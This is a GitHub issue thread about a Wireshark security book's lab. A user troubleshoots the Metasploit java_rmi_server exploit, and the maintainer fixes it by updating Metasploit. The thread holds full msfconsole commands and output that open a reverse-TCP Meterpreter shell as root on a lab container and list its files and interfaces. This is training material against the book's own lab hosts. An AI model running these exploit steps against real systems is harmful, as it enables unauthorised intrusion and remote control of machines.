w4sp-book / w4sp-lab

Lab environment for the Wireshark for Security Professionals book
https://github.com/w4sp-book/w4sp-lab/wiki/Lab-Installation
70 stars 42 forks source link

issue running Java RMI exploit #9

Open robertwatkins opened 7 years ago

robertwatkins commented 7 years ago

I'm not able to run the java_rmi_server exploit successfully, each time, I get a message "Meterpreter session X closed. Reason: Died"

Looking at the wireshark traces on port 4444 and using (follow>tcp stream), I see what appears to be the staging jar files being sent, and then the connection starts to show a few [psh,ack] and then [rst,ack]. Does this show the meterpreter dying?

Regardless, is there something I can do to get this exploit to work?

=============================== Wireshark Captures java_rmi_server.zip java_rmi_server.port4444.zip

=============================== Metasploit console

msf > use exploit/multi/misc/java_rmi_server msf exploit(java_rmi_server) > set RHOST 10.100.200.138 RHOST => 10.100.200.138 msf exploit(java_rmi_server) > set PAYLOAD java/meterpreter/bind_tcp PAYLOAD => java/meterpreter/bind_tcp msf exploit(java_rmi_server) > exploit

[] Started bind handler [] 10.100.200.138:1099 - Using URL: http://0.0.0.0:8080/F2PdPb [] 10.100.200.138:1099 - Local IP: http://192.100.200.166:8080/F2PdPb [] 10.100.200.138:1099 - Server started. [] 10.100.200.138:1099 - Sending RMI Header... [] 10.100.200.138:1099 - Sending RMI Call... [] 10.100.200.138:1099 - Replied to request for payload JAR [] Sending stage (49645 bytes) to 10.100.200.138 [] Meterpreter session 1 opened (192.100.200.166:43545 -> 10.100.200.138:4444) at 2017-05-01 20:54:21 -0500 [] 10.100.200.138 - Meterpreter session 1 closed. Reason: Died [-] 10.100.200.138:1099 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP >Server didn't get a payload request [] 10.100.200.138:1099 - Server stopped. [] Exploit completed, but no session was created. msf exploit(java_rmi_server) > [-] Meterpreter session 1 is not valid and will be closed

w4sp-book commented 7 years ago

Hmm, so I am able to reproduce this but not immediately sure what the issue is. I will start digging into this although likely not to make too much progress until this weekend.

The exploit should send the first stager and then that stager should trigger an HTTP request to the URL that metasploit serves the actual payload from (http://192.100.200.166:8080/F2PdPb). Metasploit seems to be complaining that it doesn't get that connect back....

Might be worth trying to play with the HTTPDELAY option to see if it helps.

robertwatkins commented 7 years ago

thanks for the reply ( I never know if it's something on my side or something in general). I tried modifying the HTTPDELAY, but the message appears before the delay starts it's countdown.

I'm enjoying the book and the lab very much and may just take this opportunity to dig into docker a bit and look at how this lab is set up.

w4sp-book commented 7 years ago

Really glad you are enjoying the book and labs! I am sorry about all the bugs but really appreciate the bug reports, so keep em coming. Will give an update as soon as I get a chance to really dig into this issue.

It is definitely on my list of things I would like to add to the wiki is some more details about how the lab works underneath the hood. The code isn't particularly pretty and I am doing some funky stuff to setup the network manually.

w4sp-book commented 7 years ago

@robertwatkins - ok, so I actually don't know what the issue is that caused this, but I was able to resolve it by just updating Metasploit. If you run sudo msfupdate from the command line this should update the version of msfconsole. Metasploit is a fast moving project at times, which is great in that you always have fresh exploits, but can also mean it has more opportunity to introduce bugs and break stuff.

Below is a quick run through of exploiting this. Notice that it says it fails and doesn't drop you to a meterpreter shell but if you use the 'sessions' command you are able to interact successfully.

msf > use exploit/multi/misc/java_rmi_server
msf exploit(java_rmi_server) > ping sploit
[*] exec: ping sploit

PING sploit.labs (10.100.200.134) 56(84) bytes of data.
64 bytes from sploit.labs (10.100.200.134): icmp_seq=1 ttl=63 time=0.065 ms
64 bytes from sploit.labs (10.100.200.134): icmp_seq=2 ttl=63 time=0.133 ms
64 bytes from sploit.labs (10.100.200.134): icmp_seq=3 ttl=63 time=0.056 ms
^CInterrupt: use the 'exit' command to quit
msf exploit(java_rmi_server) > set RHOST 10.100.200.134
RHOST => 10.100.200.134
msf exploit(java_rmi_server) > exploit

[*] Started reverse TCP handler on 192.168.56.101:4444 
[*] 10.100.200.134:1099 - Using URL: http://0.0.0.0:8080/bnfB2s2cmKl
[*] 10.100.200.134:1099 - Local IP: http://192.100.200.121:8080/bnfB2s2cmKl
[*] 10.100.200.134:1099 - Server started.
[*] 10.100.200.134:1099 - Sending RMI Header...
[*] 10.100.200.134:1099 - Sending RMI Call...
[*] 10.100.200.134:1099 - Replied to request for payload JAR
[*] Sending stage (49645 bytes) to 192.168.56.1
[*] Meterpreter session 2 opened (192.168.56.101:4444 -> 192.168.56.1:52680) at 2017-05-07 13:03:37 -0500
[-] 10.100.200.134:1099 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 10.100.200.134:1099 - Server stopped.
[*] Exploit completed, but no session was created.
msf exploit(java_rmi_server) > sessions

Active sessions
===============

  Id  Type                    Information    Connection
  --  ----                    -----------    ----------
  2   meterpreter java/linux  root @ sploit  192.168.56.101:4444 -> 192.168.56.1:52680 (10.100.200.134)

msf exploit(java_rmi_server) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > ls
Listing: /
==========

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100667/rw-rw-rwx  0     fil   2017-05-07 13:02:49 -0500  .dockerenv
40666/rw-rw-rw-   4096  dir   2016-09-16 18:53:14 -0500  bin
40666/rw-rw-rw-   4096  dir   2008-04-15 00:53:59 -0500  boot
40666/rw-rw-rw-   2860  dir   2017-05-07 13:02:49 -0500  dev
40666/rw-rw-rw-   4096  dir   2017-05-07 13:03:15 -0500  etc
40666/rw-rw-rw-   4096  dir   2008-04-15 00:53:59 -0500  home
40666/rw-rw-rw-   4096  dir   2016-09-16 18:52:56 -0500  initrd
40666/rw-rw-rw-   4096  dir   2016-09-16 18:59:27 -0500  lib
40666/rw-rw-rw-   4096  dir   2016-09-16 18:52:56 -0500  media
40666/rw-rw-rw-   4096  dir   2008-04-15 00:53:59 -0500  mnt
40666/rw-rw-rw-   4096  dir   2016-09-16 18:52:56 -0500  opt
40666/rw-rw-rw-   0     dir   2017-05-07 13:02:49 -0500  proc
40666/rw-rw-rw-   4096  dir   2016-09-16 18:52:56 -0500  root
40666/rw-rw-rw-   4096  dir   2016-09-16 18:59:33 -0500  sbin
40666/rw-rw-rw-   4096  dir   2016-09-16 18:52:56 -0500  srv
100666/rw-rw-rw-  195   fil   2016-09-16 18:35:23 -0500  start_sploits.sh
40666/rw-rw-rw-   0     dir   2017-05-07 13:02:49 -0500  sys
40666/rw-rw-rw-   4096  dir   2017-05-07 13:03:38 -0500  tmp
40666/rw-rw-rw-   4096  dir   2016-09-16 18:59:36 -0500  usr
40666/rw-rw-rw-   4096  dir   2016-09-16 18:59:37 -0500  var
40666/rw-rw-rw-   4096  dir   2016-09-16 18:59:22 -0500  vuln

meterpreter > ifconfig

Interface  1
============
Name         : sw2_6 - sw2_6
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 10.100.200.134
IPv4 Netmask : 255.0.0.0
IPv6 Address : fe80::1428:ecff:fefa:9962
IPv6 Netmask : ::

Interface  2
============
Name         : lo - lo
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ::

meterpreter > 
robertwatkins commented 7 years ago

very cool. I was able to see what you see. Though before I read your commands to ensure I was on the same server, I used cat /etc/hostname to see that I was on 'sploit'

Thanks again. On to the next lab :)